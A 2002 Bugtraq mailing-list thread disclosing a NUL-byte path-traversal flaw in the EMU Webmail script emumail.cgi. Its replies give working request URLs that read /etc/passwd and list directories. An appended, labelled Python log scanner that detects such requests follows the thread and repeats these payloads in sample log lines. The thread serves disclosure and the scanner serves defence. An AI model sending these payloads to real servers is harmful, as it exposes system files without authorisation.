Re: emumail.cgi


 



You can also do this:
http://site/emumail.cgi?type=/../../../../../etc/passwd%00

But you cannot do this:
http://site/emumail.cgi?type=/../../../../../bin/ls%20/%00

/* 
 * Andreas Constantinides (MegaHz)
 * Admin of cHp (www.cyhackportal.com)
 *
 */


----- Original Message ----- 
From: "N|ghtHawk" <nighthawk@hackers4hackers.nl>
To: <bugtraq@securityfocus.org>
Sent: Friday, April 05, 2002 3:10 AM
Subject: Re: emumail.cgi


> >name            : emumail.cgi
> >date            : 04/04/2002
> >description     : EMU Webmail: how to check your email
> >from the web. 
> >severity        : Low/average-risk
> >homepage        : www.emumail.com
> >
> >Any user can view files on the remote system:
> >xxx/PATH/emumail.cgi?type=FILE%00
> >
> >
> >
> >The vendor was contacted about that
> >
> 
> http://site/emumail.cgi?type=.%00
> 
> Seems to give the directory index of the current directory.
> 
> http://site/emumail.cgi?type=..%00
> 
> Seems to give the directory index of ../
> 
> -- 
> N|ghtHawk
> http://www.hackers4hackers.org
> 
> 
> 
> 
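Added example (not part of the original posts): a log check a defender could run to find requests like the ones quoted in this thread, flagging `type` values that decode to a NUL byte or to `.`/`..` path segments. The log lines are constructed, and the `/cgi-bin/` path, the `type=login` value and the function names are assumptions.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed access-log lines; addresses, paths and "type=login" are made up.
SAMPLE_LOG = """\
192.0.2.10 - - [05/Apr/2002:03:10:01 +0000] "GET /cgi-bin/emumail.cgi?type=login HTTP/1.0" 200 5120
192.0.2.44 - - [05/Apr/2002:03:11:17 +0000] "GET /cgi-bin/emumail.cgi?type=/../../../../../etc/passwd%00 HTTP/1.0" 200 1843
192.0.2.44 - - [05/Apr/2002:03:11:40 +0000] "GET /cgi-bin/emumail.cgi?type=.%00 HTTP/1.0" 200 912
192.0.2.44 - - [05/Apr/2002:03:12:02 +0000] "GET /cgi-bin/emumail.cgi?type=..%00 HTTP/1.0" 200 1004
192.0.2.77 - - [05/Apr/2002:03:15:30 +0000] "GET /cgi-bin/emumail.cgi?type=%252e%252e%252fetc%252fpasswd%2500 HTTP/1.0" 404 210
192.0.2.80 - - [05/Apr/2002:03:16:00 +0000] "GET /index.html?type=..%00 HTTP/1.0" 200 300
"""

REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (\S+) [^"]*" (\d{3})\b')

def fully_decode(value, max_rounds=3):
    # Undo repeated percent-encoding (%2500 -> %00 -> NUL), bounded to avoid loops.
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def classify(value):
    reasons = []
    if "\x00" in value:
        reasons.append("nul-byte")
    # Only the part before the first NUL is inspected as a path.
    segments = value.split("\x00")[0].replace("\\", "/").split("/")
    if any(seg in (".", "..") for seg in segments):
        reasons.append("dot-segment")
    return reasons

def scan(log_text, script="emumail.cgi"):
    # Returns (client, HTTP status, reasons); a 200 status means the request
    # was answered and the response deserves a closer look.
    findings = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        url = urlsplit(m.group(2)) if m else None
        if url is None or not url.path.endswith("/" + script):
            continue
        for raw in parse_qs(url.query, keep_blank_values=True).get("type", []):
            reasons = classify(fully_decode(raw))
            if reasons:
                findings.append((m.group(1), int(m.group(3)), reasons))
    return findings
```

Calling `scan(SAMPLE_LOG)` returns four findings: the three requests from 192.0.2.44 and the double-encoded one from 192.0.2.77.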




